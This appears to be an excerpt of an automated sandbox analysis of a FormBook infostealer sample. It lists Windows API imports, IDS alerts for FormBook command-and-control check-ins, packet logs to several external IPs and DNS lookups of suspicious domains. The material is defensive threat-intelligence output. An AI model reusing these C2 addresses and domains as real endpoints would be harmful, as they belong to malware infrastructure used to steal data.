GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                              2024-10-08T15:54:47.997439+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000991.184.0.20080TCP
                                                                                              2024-10-08T15:54:50.681531+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001091.184.0.20080TCP
                                                                                              2024-10-08T15:54:53.318568+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65001191.184.0.20080TCP
                                                                                              2024-10-08T15:54:53.318568+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65001191.184.0.20080TCP
                                                                                              2024-10-08T15:54:58.830090+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001213.248.169.4880TCP
                                                                                              2024-10-08T15:55:01.380573+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001313.248.169.4880TCP
                                                                                              2024-10-08T15:55:04.112030+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001413.248.169.4880TCP
                                                                                              2024-10-08T15:55:06.485146+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65001513.248.169.4880TCP
                                                                                              2024-10-08T15:55:06.485146+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65001513.248.169.4880TCP
                                                                                              2024-10-08T15:55:26.847034+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002143.242.202.16980TCP
                                                                                              2024-10-08T15:55:29.531562+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002243.242.202.16980TCP
                                                                                              2024-10-08T15:55:32.142489+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002343.242.202.16980TCP
                                                                                              2024-10-08T15:55:34.514487+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65002443.242.202.16980TCP
                                                                                              2024-10-08T15:55:34.514487+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65002443.242.202.16980TCP
                                                                                              2024-10-08T15:55:40.590660+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650025103.224.182.24280TCP
                                                                                              2024-10-08T15:55:44.298531+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650026103.224.182.24280TCP
                                                                                              2024-10-08T15:55:46.851792+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650027103.224.182.24280TCP
                                                                                              2024-10-08T15:55:49.396086+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650028103.224.182.24280TCP
                                                                                              2024-10-08T15:55:49.396086+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650028103.224.182.24280TCP
                                                                                              2024-10-08T15:55:56.301612+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002985.159.66.9380TCP
                                                                                              2024-10-08T15:55:59.785995+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003085.159.66.9380TCP
                                                                                              2024-10-08T15:56:02.332989+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003185.159.66.9380TCP
                                                                                              Oct 8, 2024 15:54:31.453712940 CEST805000463.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:31.456693888 CEST5000480192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:31.468534946 CEST5000480192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:31.474179983 CEST805000463.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:32.058708906 CEST805000463.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:32.059571028 CEST805000463.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:32.059633970 CEST5000480192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:32.973613977 CEST5000480192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:33.993144989 CEST5000580192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:33.998802900 CEST805000563.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:33.998894930 CEST5000580192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:34.010711908 CEST5000580192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:34.015656948 CEST805000563.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:34.593308926 CEST805000563.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:34.593488932 CEST805000563.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:34.593707085 CEST5000580192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:35.520595074 CEST5000580192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:36.540535927 CEST5000680192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:36.545639992 CEST805000663.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:36.545748949 CEST5000680192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:36.562881947 CEST5000680192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:36.568073034 CEST805000663.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:36.568097115 CEST805000663.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:37.140346050 CEST805000663.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:37.140842915 CEST805000663.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:37.140939951 CEST5000680192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:38.067126989 CEST5000680192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:39.086886883 CEST5000780192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:39.091809988 CEST805000763.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:39.091943979 CEST5000780192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:39.099855900 CEST5000780192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:39.105191946 CEST805000763.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:39.777832031 CEST805000763.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:39.788583040 CEST805000763.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:39.788672924 CEST5000780192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:39.789550066 CEST5000780192.168.2.663.250.47.40
                                                                                              Oct 8, 2024 15:54:39.794457912 CEST805000763.250.47.40192.168.2.6
                                                                                              Oct 8, 2024 15:54:44.827635050 CEST5000880192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:44.832731009 CEST805000891.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:44.833051920 CEST5000880192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:44.842623949 CEST5000880192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:44.847459078 CEST805000891.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:45.463727951 CEST805000891.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:45.463876963 CEST805000891.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:45.464154005 CEST5000880192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:46.348496914 CEST5000880192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:47.371926069 CEST5000980192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:47.377018929 CEST805000991.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:47.377156019 CEST5000980192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:47.388355017 CEST5000980192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:47.393834114 CEST805000991.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:47.997174025 CEST805000991.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:47.997324944 CEST805000991.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:47.997438908 CEST5000980192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:48.895265102 CEST5000980192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:50.033982992 CEST5001080192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:50.038995028 CEST805001091.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:50.039067030 CEST5001080192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:50.095005035 CEST5001080192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:50.099909067 CEST805001091.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:50.100231886 CEST805001091.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:50.680727959 CEST805001091.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:50.680838108 CEST805001091.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:50.681530952 CEST5001080192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:51.598701954 CEST5001080192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:52.622975111 CEST5001180192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:52.628220081 CEST805001191.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:52.628623009 CEST5001180192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:52.654541969 CEST5001180192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:52.659837008 CEST805001191.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:53.318254948 CEST805001191.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:53.318289995 CEST805001191.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:53.318317890 CEST805001191.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:53.318567991 CEST5001180192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:53.321583033 CEST5001180192.168.2.691.184.0.200
                                                                                              Oct 8, 2024 15:54:53.327510118 CEST805001191.184.0.200192.168.2.6
                                                                                              Oct 8, 2024 15:54:58.355168104 CEST5001280192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:54:58.360057116 CEST805001213.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:54:58.360130072 CEST5001280192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:54:58.377140045 CEST5001280192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:54:58.382071972 CEST805001213.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:54:58.829993010 CEST805001213.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:54:58.830090046 CEST5001280192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:54:59.879638910 CEST5001280192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:54:59.884907961 CEST805001213.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:00.900568962 CEST5001380192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:00.905746937 CEST805001313.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:00.905870914 CEST5001380192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:00.920562029 CEST5001380192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:00.925528049 CEST805001313.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:01.376338005 CEST805001313.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:01.380573034 CEST5001380192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:02.457118988 CEST5001380192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:02.462311029 CEST805001313.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:03.460740089 CEST5001480192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:03.466362000 CEST805001413.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:03.468753099 CEST5001480192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:03.480688095 CEST5001480192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:03.486077070 CEST805001413.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:03.486093998 CEST805001413.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:04.111953020 CEST805001413.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:04.112030029 CEST5001480192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:04.991590977 CEST5001480192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:04.996474981 CEST805001413.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:06.009942055 CEST5001580192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:06.015153885 CEST805001513.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:06.015240908 CEST5001580192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:06.025427103 CEST5001580192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:06.030349016 CEST805001513.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:06.484975100 CEST805001513.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:06.485038996 CEST805001513.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:06.485146046 CEST5001580192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:06.488095045 CEST5001580192.168.2.613.248.169.48
                                                                                              Oct 8, 2024 15:55:06.493019104 CEST805001513.248.169.48192.168.2.6
                                                                                              Oct 8, 2024 15:55:25.960912943 CEST5002180192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:25.966254950 CEST805002143.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:25.966351986 CEST5002180192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:25.977612972 CEST5002180192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:25.982615948 CEST805002143.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:26.846904993 CEST805002143.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:26.846920967 CEST805002143.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:26.847033978 CEST5002180192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:27.492628098 CEST5002180192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:28.509762049 CEST5002280192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:28.514679909 CEST805002243.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:28.514784098 CEST5002280192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:28.532839060 CEST5002280192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:28.537698030 CEST805002243.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:29.531091928 CEST805002243.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:29.531203032 CEST805002243.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:29.531220913 CEST805002243.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:29.531562090 CEST5002280192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:29.918478966 CEST805002243.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:29.918535948 CEST5002280192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:30.036427975 CEST5002280192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:31.056647062 CEST5002380192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:31.061619043 CEST805002343.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:31.061940908 CEST5002380192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:31.075041056 CEST5002380192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:31.080144882 CEST805002343.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:31.080276966 CEST805002343.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:32.142285109 CEST805002343.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:32.142441034 CEST805002343.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:32.142488956 CEST5002380192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:32.583283901 CEST5002380192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:33.603436947 CEST5002480192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:33.608813047 CEST805002443.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:33.610719919 CEST5002480192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:33.618738890 CEST5002480192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:33.623940945 CEST805002443.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:34.513824940 CEST805002443.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:34.514311075 CEST805002443.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:34.514487028 CEST5002480192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:34.517487049 CEST5002480192.168.2.643.242.202.169
                                                                                              Oct 8, 2024 15:55:34.522387028 CEST805002443.242.202.169192.168.2.6
                                                                                              Oct 8, 2024 15:55:39.946463108 CEST5002580192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:39.951565027 CEST8050025103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:39.951663971 CEST5002580192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:39.966044903 CEST5002580192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:39.970978022 CEST8050025103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:40.590358019 CEST8050025103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:40.590601921 CEST8050025103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:40.590660095 CEST5002580192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:42.661047935 CEST5002580192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:43.680011988 CEST5002680192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:43.684907913 CEST8050026103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:43.685175896 CEST5002680192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:43.696643114 CEST5002680192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:43.701653957 CEST8050026103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:44.298182011 CEST8050026103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:44.298419952 CEST8050026103.224.182.242192.168.2.6
                                                                                              Oct 8, 2024 15:55:44.298531055 CEST5002680192.168.2.6103.224.182.242
                                                                                              Oct 8, 2024 15:55:45.207850933 CEST5002680192.168.2.6103.224.182.242
Oct 8, 2024 15:55:46.227595091 CEST | 50027 | 80 | 192.168.2.6 | 103.224.182.242
Oct 8, 2024 15:55:46.233283043 CEST | 80 | 50027 | 103.224.182.242 | 192.168.2.6
Oct 8, 2024 15:55:46.233383894 CEST | 50027 | 80 | 192.168.2.6 | 103.224.182.242
Oct 8, 2024 15:55:46.245667934 CEST | 50027 | 80 | 192.168.2.6 | 103.224.182.242
Oct 8, 2024 15:55:46.250643969 CEST | 80 | 50027 | 103.224.182.242 | 192.168.2.6
Oct 8, 2024 15:55:46.250679016 CEST | 80 | 50027 | 103.224.182.242 | 192.168.2.6
Oct 8, 2024 15:55:46.851593971 CEST | 80 | 50027 | 103.224.182.242 | 192.168.2.6
Oct 8, 2024 15:55:46.851720095 CEST | 80 | 50027 | 103.224.182.242 | 192.168.2.6
Oct 8, 2024 15:55:46.851792097 CEST | 50027 | 80 | 192.168.2.6 | 103.224.182.242
Oct 8, 2024 15:55:47.756692886 CEST | 50027 | 80 | 192.168.2.6 | 103.224.182.242
Oct 8, 2024 15:55:48.774337053 CEST | 50028 | 80 | 192.168.2.6 | 103.224.182.242
Oct 8, 2024 15:55:48.779453993 CEST | 80 | 50028 | 103.224.182.242 | 192.168.2.6
Oct 8, 2024 15:55:48.779587030 CEST | 50028 | 80 | 192.168.2.6 | 103.224.182.242
Oct 8, 2024 15:55:48.788316965 CEST | 50028 | 80 | 192.168.2.6 | 103.224.182.242
Oct 8, 2024 15:55:48.793210030 CEST | 80 | 50028 | 103.224.182.242 | 192.168.2.6
Oct 8, 2024 15:55:49.395872116 CEST | 80 | 50028 | 103.224.182.242 | 192.168.2.6
Oct 8, 2024 15:55:49.395889044 CEST | 80 | 50028 | 103.224.182.242 | 192.168.2.6
Oct 8, 2024 15:55:49.395904064 CEST | 80 | 50028 | 103.224.182.242 | 192.168.2.6
Oct 8, 2024 15:55:49.396085978 CEST | 50028 | 80 | 192.168.2.6 | 103.224.182.242
Oct 8, 2024 15:55:49.396085978 CEST | 50028 | 80 | 192.168.2.6 | 103.224.182.242
Oct 8, 2024 15:55:49.399367094 CEST | 50028 | 80 | 192.168.2.6 | 103.224.182.242
Oct 8, 2024 15:55:49.404750109 CEST | 80 | 50028 | 103.224.182.242 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 15:53:09.911891937 CEST | 60249 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:53:09.920198917 CEST | 53 | 60249 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 15:53:14.930412054 CEST | 64169 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:53:14.940895081 CEST | 53 | 64169 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 15:53:19.961343050 CEST | 61094 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:53:20.436914921 CEST | 53 | 61094 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 15:53:36.055149078 CEST | 65292 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:53:36.074657917 CEST | 53 | 65292 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 15:53:50.180089951 CEST | 61031 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:53:50.640687943 CEST | 53 | 61031 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 15:54:03.900480986 CEST | 49215 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:54:04.274966955 CEST | 53 | 49215 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 15:54:17.899621964 CEST | 63741 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:54:17.958338976 CEST | 53 | 63741 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 15:54:31.258997917 CEST | 62648 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:54:31.444658995 CEST | 53 | 62648 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 15:54:44.808316946 CEST | 64960 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:54:44.822880030 CEST | 53 | 64960 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 15:54:58.338051081 CEST | 52364 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:54:58.351511002 CEST | 53 | 52364 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 15:55:11.496583939 CEST | 54818 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:55:25.008346081 CEST | 57377 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:55:25.958050013 CEST | 53 | 57377 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 15:55:39.528625011 CEST | 56950 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:55:39.943692923 CEST | 53 | 56950 | 1.1.1.1 | 192.168.2.6
Oct 8, 2024 15:55:54.414731979 CEST | 53523 | 53 | 192.168.2.6 | 1.1.1.1
Oct 8, 2024 15:55:54.771203041 CEST | 53 | 53523 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 15:53:09.911891937 CEST | 192.168.2.6 | 1.1.1.1 | 0x1446 | Standard query (0) | www.woshop.online | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:53:14.930412054 CEST | 192.168.2.6 | 1.1.1.1 | 0x733b | Standard query (0) | www.kxshopmr.store | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:53:19.961343050 CEST | 192.168.2.6 | 1.1.1.1 | 0xfc4f | Standard query (0) | www.elsupertodo.net | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:53:36.055149078 CEST | 192.168.2.6 | 1.1.1.1 | 0x80a6 | Standard query (0) | www.omexai.info | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:53:50.180089951 CEST | 192.168.2.6 | 1.1.1.1 | 0x8a53 | Standard query (0) | www.tekilla.wtf | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:54:03.900480986 CEST | 192.168.2.6 | 1.1.1.1 | 0x9c3d | Standard query (0) | www.bola88site.one | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:54:17.899621964 CEST | 192.168.2.6 | 1.1.1.1 | 0xb283 | Standard query (0) | www.languagemodel.pro | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:54:31.258997917 CEST | 192.168.2.6 | 1.1.1.1 | 0x8254 | Standard query (0) | www.kexweb.top | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:54:44.808316946 CEST | 192.168.2.6 | 1.1.1.1 | 0x51fc | Standard query (0) | www.jobworklanka.online | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:54:58.338051081 CEST | 192.168.2.6 | 1.1.1.1 | 0xaf3a | Standard query (0) | www.dyme.tech | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:11.496583939 CEST | 192.168.2.6 | 1.1.1.1 | 0xff10 | Standard query (0) | www.arlon-commerce.com | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:25.008346081 CEST | 192.168.2.6 | 1.1.1.1 | 0x5c7c | Standard query (0) | www.mizuquan.top | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:39.528625011 CEST | 192.168.2.6 | 1.1.1.1 | 0xe706 | Standard query (0) | www.nobartv6.website | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:55:54.414731979 CEST | 192.168.2.6 | 1.1.1.1 | 0x4af6 | Standard query (0) | www.sailnway.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 15:53:09.920198917 CEST | 1.1.1.1 | 192.168.2.6 | 0x1446 | Name error (3) | www.woshop.online | none | none | A (IP address) | IN (0x0001) | false
Oct 8, 2024 15:53:14.940895081 CEST | 1.1.1.1 | 192.168.2.6 | 0x733b | Name error (3) | www.kxshopmr.store | none | none | A (IP address) | IN (0x0001) | false
